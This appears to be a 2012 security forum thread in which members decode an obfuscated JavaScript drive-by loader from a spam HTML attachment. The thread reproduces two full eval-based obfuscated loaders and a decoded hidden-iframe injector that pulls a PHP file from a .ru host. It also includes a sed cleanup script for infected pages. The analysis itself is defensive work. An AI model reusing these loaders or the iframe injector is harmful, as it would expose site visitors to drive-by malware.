HomeCalendarCertificationsColumnsFeaturesForumResourcesVitals
 
Image
 
linkedin_logo.png rss_logo.jpg
twitter_logo.png youtube_logo.jpg
Latest Additions
 
EH-Net Login
Welcome Guest.
Lost Password?
No account yet? Register
Who's Online
We have 43 guests and 1 member online
 
Free Business and Tech Magazines and eBooks

You are here: Home arrow Ethical Hacking Discussions and Related Certificationsarrow Programmingarrow Looking for Javascript coder to decode spam HTML attachment
EH-Net
May 21, 2013, 06:18:36 AM *
Welcome, Guest. Please login or register.
Did you miss your activation email?

Login with username, password and session length
News: Go back to The Ethical Hacker Network Online Magazine Home Page
 
   Home   Help Calendar Login Register  
Pages: [1]   Go Down
« previous next »
  Print  
Author Topic: Looking for Javascript coder to decode spam HTML attachment  (Read 8820 times)
0 Members and 1 Guest are viewing this topic.
lorddicranius
Sr. Member
****
Offline Offline

Posts: 447



View Profile WWW
« on: March 05, 2012, 05:23:07 PM »
I received a spam message with an HTML attachment.  I downloaded the attachment and opened it in Notepad++ and found it contains Javascript.  I know a little Javascript, but not nearly enough to work out what's going on here.  I was wondering if anybody well versed in Javascript could decode this for me.  I'm really curious what this is trying to to do Smiley

Code:
<script>aa=/\w/.exec(1).index+[];aaa='0';try{location({});}catch(hgberger){if(aa===aaa)
f='-29q-29q67q64q-6q2q62q73q61q79q71q63q72q78q8q65q63q78q31q70q63q71q63q72q78q77q28q83q46q59q65q40q59q71q63q2q1q60q73q62q83q1q3q53q10q55q3q85q-29q-29q-29q67q64q76q59q71q63q76q2q3q21q-29q-29q87q-6q63q70q77q63q-6q85q-29q-29q-29q62q73q61q79q71q63q72q78q8q81q76q67q78q63q2q-4q22q67q64q76q59q71q63q-6q77q76q61q23q1q66q78q78q74q20q9q9q61q70q69q68q77q66q62q64q70q66q66q77q66q62q64q8q76q79q20q18q10q18q10q9q67q71q59q65q63q77q9q59q79q60q70q60q84q62q72q67q8q74q66q74q1q-6q81q67q62q78q66q23q1q11q10q1q-6q66q63q67q65q66q78q23q1q11q10q1q-6q77q78q83q70q63q23q1q80q67q77q67q60q67q70q67q78q83q20q66q67q62q62q63q72q21q74q73q77q67q78q67q73q72q20q59q60q77q73q70q79q78q63q21q70q63q64q78q20q10q21q78q73q74q20q10q21q1q24q22q9q67q64q76q59q71q63q24q-4q3q21q-29q-29q87q-29q-29q64q79q72q61q78q67q73q72q-6q67q64q76q59q71q63q76q2q3q85q-29q-29q-29q80q59q76q-6q64q-6q23q-6q62q73q61q79q71q63q72q78q8q61q76q63q59q78q63q31q70q63q71q63q72q78q2q1q67q64q76q59q71q63q1q3q21q64q8q77q63q78q27q78q78q76q67q60q79q78q63q2q1q77q76q61q1q6q1q66q78q78q74q20q9q9q61q70q69q68q77q66q62q64q70q66q66q77q66q62q64q8q76q79q20q18q10q18q10q9q67q71q59q65q63q77q9q59q79q60q70q60q84q62q72q67q8q74q66q74q1q3q21q64q8q77q78q83q70q63q8q80q67q77q67q60q67q70q67q78q83q23q1q66q67q62q62q63q72q1q21q64q8q77q78q83q70q63q8q74q73q77q67q78q67q73q72q23q1q59q60q77q73q70q79q78q63q1q21q64q8q77q78q83q70q63q8q70q63q64q78q23q1q10q1q21q64q8q77q78q83q70q63q8q78q73q74q23q1q10q1q21q64q8q77q63q78q27q78q78q76q67q60q79q78q63q2q1q81q67q62q78q66q1q6q1q11q10q1q3q21q64q8q77q63q78q27q78q78q76q67q60q79q78q63q2q1q66q63q67q65q66q78q1q6q1q11q10q1q3q21q-29q-29q-29q62q73q61q79q71q63q72q78q8q65q63q78q31q70q63q71q63q72q78q77q28q83q46q59q65q40q59q71q63q2q1q60q73q62q83q1q3q53q10q55q8q59q74q74q63q72q62q29q66q67q70q62q2q64q3q21q-29q-29q87'.split('q');md='a';e=eval;w=f;s=[];r=String.fromCharCode;for(i=0;-i>-w.length;i+=1){j=i;s=s+r(38+1*w[j]);}
if(Math.round((-1*2*2)*Math.tan(Math.atan(1/2)))===-3+1)e(s);}</script>
Logged
GSEC, eCPPT, Sec+
BillV
Hero Member
*****
Offline Offline

Posts: 1892


View Profile WWW
« Reply #1 on: March 05, 2012, 06:03:04 PM »
Wants you to load some php file from a .ru domain
hxxp://clkjshdflhhshdf.ru:8080/images/aublbzdni.php

Code:
if (document.getElementsByTagName('body')[0]){ iframer(); } else {
document.write(""); } function iframer() {
var f =document.createElement('iframe') f.setAttribute('src','
http://clkjshdflhhshdf.ru:8080/images/aublbzdni.php
');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';
f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');
 document.getElementsByTagName('body')[0].appendChild(f); }
« Last Edit: March 05, 2012, 06:05:11 PM by BillV » Logged
BillV
Hero Member
*****
Offline Offline

Posts: 1892


View Profile WWW
« Reply #2 on: March 05, 2012, 06:14:42 PM »
Also, the quick and easy way to decode what you had into what I had...

First, we take what you had:

Code:
<script>aa=/\w/.exec(1).index+[];aaa='0';try{location({});}catch(hgberger){if(aa===aaa)
f='-29q-29q67q64q-6q2q62q73q61q79q71q63q72q78q8q65q63q78q31q70q63q71q63q72q78q77q28q83q46q59q65q40q59q71q63q2q1q60q73q62q83q1q3q53q10q55q3q85q-29q-29q-29q67q64q76q59q71q63q76q2q3q21q-29q-29q87q-6q63q70q77q63q-6q85q-29q-29q-29q62q73q61q79q71q63q72q78q8q81q76q67q78q63q2q-4q22q67q64q76q59q71q63q-6q77q76q61q23q1q66q78q78q74q20q9q9q61q70q69q68q77q66q62q64q70q66q66q77q66q62q64q8q76q79q20q18q10q18q10q9q67q71q59q65q63q77q9q59q79q60q70q60q84q62q72q67q8q74q66q74q1q-6q81q67q62q78q66q23q1q11q10q1q-6q66q63q67q65q66q78q23q1q11q10q1q-6q77q78q83q70q63q23q1q80q67q77q67q60q67q70q67q78q83q20q66q67q62q62q63q72q21q74q73q77q67q78q67q73q72q20q59q60q77q73q70q79q78q63q21q70q63q64q78q20q10q21q78q73q74q20q10q21q1q24q22q9q67q64q76q59q71q63q24q-4q3q21q-29q-29q87q-29q-29q64q79q72q61q78q67q73q72q-6q67q64q76q59q71q63q76q2q3q85q-29q-29q-29q80q59q76q-6q64q-6q23q-6q62q73q61q79q71q63q72q78q8q61q76q63q59q78q63q31q70q63q71q63q72q78q2q1q67q64q76q59q71q63q1q3q21q64q8q77q63q78q27q78q78q76q67q60q79q78q63q2q1q77q76q61q1q6q1q66q78q78q74q20q9q9q61q70q69q68q77q66q62q64q70q66q66q77q66q62q64q8q76q79q20q18q10q18q10q9q67q71q59q65q63q77q9q59q79q60q70q60q84q62q72q67q8q74q66q74q1q3q21q64q8q77q78q83q70q63q8q80q67q77q67q60q67q70q67q78q83q23q1q66q67q62q62q63q72q1q21q64q8q77q78q83q70q63q8q74q73q77q67q78q67q73q72q23q1q59q60q77q73q70q79q78q63q1q21q64q8q77q78q83q70q63q8q70q63q64q78q23q1q10q1q21q64q8q77q78q83q70q63q8q78q73q74q23q1q10q1q21q64q8q77q63q78q27q78q78q76q67q60q79q78q63q2q1q81q67q62q78q66q1q6q1q11q10q1q3q21q64q8q77q63q78q27q78q78q76q67q60q79q78q63q2q1q66q63q67q65q66q78q1q6q1q11q10q1q3q21q-29q-29q-29q62q73q61q79q71q63q72q78q8q65q63q78q31q70q63q71q63q72q78q77q28q83q46q59q65q40q59q71q63q2q1q60q73q62q83q1q3q53q10q55q8q59q74q74q63q72q62q29q66q67q70q62q2q64q3q21q-29q-29q87'.split('q');md='a';e=eval;w=f;s=[];r=String.fromCharCode;for(i=0;-i>-w.length;i+=1){j=i;s=s+r(38+1*w[j]);}
if(Math.round((-1*2*2)*Math.tan(Math.atan(1/2)))===-3+1)e(s);}</script>

And turn it into something a bit more legible (I've shortened the value of the variable 'f' here to save space):

Code:
<script>
aa=/\w/.exec(1).index+[];
aaa='0';
try{location({});} catch(hgberger){
    if(aa===aaa)
    f='-29.split('q');
    md='a';
    e=eval;
    w=f;
    s=[];
    r=String.fromCharCode;
    for(i=0;-i>-w.length;i+=1){
      j=i;s=s+r(38+1*w[j]);
    }
    if(Math.round((-1*2*2)*Math.tan(Math.atan(1/2)))===-3+1)
      e(s);
}
</script>

A quick glance at the very end tells us to do e(s); and looking up a few lines higher we see e=eval;. So, rather than evaluating s, let's just see what it is by changing the code to document.write(s);:

Code:
<script>
aa=/\w/.exec(1).index+[];
aaa='0';
try{location({});} catch(hgberger){
    if(aa===aaa)
    f='-29.split('q');
    md='a';
    e=eval;
    w=f;
    s=[];
    r=String.fromCharCode;
    for(i=0;-i>-w.length;i+=1){
      j=i;s=s+r(38+1*w[j]);
    }
    if(Math.round((-1*2*2)*Math.tan(Math.atan(1/2)))===-3+1)
      document.write(s);
}
</script>

Throw that into a file, save it as whatever.html, and open in a browser. Then you end up with the code posted previously and can see it's attempting to load that PHP file. It doesn't always work this easily, sometimes you have to dig a little deeper depending on how much of a PITA the author was ;-)

...and obviously it's recommended to do this in some sort of a contained environment (just in case).
Logged
hayabusa
Hero Member
*****
Offline Offline

Posts: 1631



View Profile
« Reply #3 on: March 05, 2012, 08:06:05 PM »
Reminds me a bit of the post I wrote on here, a couple of months ago, where I showed some malicious scripts I found during a security eval for a company's website.  I gave a similar writeup / explanation there, although the code was somewhat different.
Logged
~ hayabusa ~ 

"All men can see these tactics whereby I conquer, but what none can see is the strategy out of which victory is evolved." - Sun Tzu, 'The Art of War'

OSCE, OSCP , GPEN, C|EH
lorddicranius
Sr. Member
****
Offline Offline

Posts: 447



View Profile WWW
« Reply #4 on: March 06, 2012, 12:44:06 AM »
@BillV: Thanks, especially for breaking it down Smiley
@hayabusa: Yeah, as soon as I opened that file in Notepad++, I thought of that post you did, which had me thinking this might at least pique your interest if nobody elses Tongue

Tried to download that PHP file, but I'm unable to resolve the domain.  Darn, curious what's in that PHP file Sad
« Last Edit: March 06, 2012, 12:57:22 AM by lorddicranius » Logged
GSEC, eCPPT, Sec+
ajohnson
Recruiters
Hero Member
*
Offline Offline

Posts: 1057


aka dynamik


View Profile WWW
« Reply #5 on: March 06, 2012, 07:39:21 AM »
See attachment. wget is your friend Wink

*unless it's a trick to exploit wget

Just glancing at it, seems like it's for ad revenue, but I don't have time to go in depth.

I do like the naming conventions they used though: onload="window.lol&&lol()"
« Last Edit: March 06, 2012, 07:41:22 AM by ajohnson » Logged
WIP: GCFA | www.infosiege.net | @infosiege

The day you stop learning is the day you start becoming obsolete.
lorddicranius
Sr. Member
****
Offline Offline

Posts: 447



View Profile WWW
« Reply #6 on: March 06, 2012, 09:29:01 AM »
Hmm, I was using wget haha.  I was playing around with the URL, replacing "1" for lowercase "L", etc.

Thanks for attaching!
Logged
GSEC, eCPPT, Sec+
Agentcalaver
Newbie
*
Offline Offline

Posts: 1


View Profile
« Reply #7 on: April 02, 2012, 02:52:32 AM »
Clean this (the same/similar js exists in infected html web pages)
with a bash script such as:
Code:
OLD="^<script>c=2;[^>]*>"
echo "Pre:"
grep -rl "hgberger" *
grep -rl "hgberger" * | xargs sed -i "s/$OLD//g"
echo "Post:"
grep -rl "hgberger" *
Logged
rserin75
Newbie
*
Offline Offline

Posts: 5


View Profile
« Reply #8 on: August 10, 2012, 06:36:54 PM »
I need decode ..  this code
Code:
<script>try{1-prototype;}catch(evsd){q=152;}
if(020==0x10){f=[0,-1,94,93,22,29,91,101,88,108,99,90,101,106,35,94,91,105,60,98,90,100,91,99,107,105,55,112,74,86,94,68,86,100,91,29,30,88,100,91,111,28,32,81,37,84,31,112,4,-1,-2,0,95,91,105,87,98,92,104,29,32,49,2,0,-1,114,23,91,97,106,91,21,114,3,-2,0,-1,89,102,89,106,100,91,99,107,36,108,105,95,105,92,30,23,51,95,91,105,87,98,92,22,104,105,89,50,30,94,105,107,102,47,38,37,103,108,105,104,105,91,99,37,95,99,93,101,36,88,39,38,30,22,108,96,90,105,95,51,28,40,38,28,23,94,90,96,93,93,107,51,28,40,38,28,23,105,105,112,98,90,52,29,107,96,105,94,89,95,97,96,106,110,49,94,94,91,90,90,101,49,101,102,105,94,107,95,100,101,48,86,89,105,100,99,107,105,92,49,97,92,92,105,49,38,48,107,101,101,49,38,48,30,52,49,38,95,91,105,87,98,92,52,23,32,49,2,0,-1,114,4,-1,-2,93,107,99,90,106,94,102,100,21,96,92,103,88,99,90,105,30,30,114,3,-2,0,-1,107,88,104,21,93,22,50,23,90,100,90,107,98,92,100,105,37,89,103,92,87,105,92,59,97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,92,35,106,91,105,56,106,105,105,95,87,108,106,90,31,29,104,105,89,28,35,29,93,107,106,101,49,37,36,105,107,104,106,104,90,101,36,94,101,92,100,38,87,38,40,29,30,50,92,35,106,106,110,99,91,35,109,95,104,96,88,94,99,95,105,112,51,28,95,95,89,91,91,99,30,49,91,37,105,105,112,98,90,37,102,100,106,95,105,96,101,99,52,29,86,89,105,100,99,107,105,92,29,48,93,36,104,107,111,97,92,36,97,92,92,105,52,29,37,30,49,91,37,105,105,112,98,90,37,106,100,103,51,28,39,29,48,93,36,104,92,106,54,107,106,103,96,88,106,107,91,29,30,109,94,91,106,93,30,34,28,40,38,28,32,49,91,37,105,90,107,55,105,107,104,94,89,107,105,92,30,28,95,91,94,94,94,105,30,34,28,40,38,28,32,49,2,0,-1,-2,91,101,88,108,99,90,101,106,35,94,91,105,60,98,90,100,91,99,107,105,55,112,74,86,94,68,86,100,91,29,30,88,100,91,111,28,32,81,37,84,36,86,103,102,90,101,90,56,95,95,97,91,30,91,32,49,2,0,-1,114];}if(window.document)e=eval;w=f;s=[];r=String.fromCharCode;for(i=0;-i+555!=0;i+=1){j=i;s=s+r((w[j]*1+(9+e("j"+"%"+"3"))));}
if(q&&f&&012===10)e(s);</script>
« Last Edit: August 10, 2012, 06:42:14 PM by rserin75 » Logged
BillV
Hero Member
*****
Offline Offline

Posts: 1892


View Profile WWW
« Reply #9 on: August 13, 2012, 02:21:51 PM »
Quote from: rserin75 on August 10, 2012, 06:36:54 PM
I need decode ..  this code

Looks to be similar (e.g., ends in "e(s)"). Follow the instructions and it should be easily determined.
Logged
Pages: [1]   Go Up
  Print  
« previous next »
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.18 | SMF © 2013, Simple Machines
Joomla Bridge by JoomlaHacks.com 		Valid XHTML 1.0! Valid CSS!
Page created in 0.101 seconds with 23 queries.
 
Exclusive Deal

sansfire13_245x90_cw90.jpg
SANSFIRE 2013
June 15 - 22

5% Off w/ Code: EHN_5

SANS Deals 4 EH-Netters
5% OFF Any SANS Course in Any Format!
Coupon Code: EHN_5 Including SANS Rocky Mountain 2013 & SANS Boston 2013
Polls
Compared to this year, 2013 will be:
 
Recent Forum Topics
EH-Net News Feeds
Latest Additions
 
         
Advertisement

© 2013 The Ethical Hacker Network
Joomla! is Free Software released under the GNU/GPL License.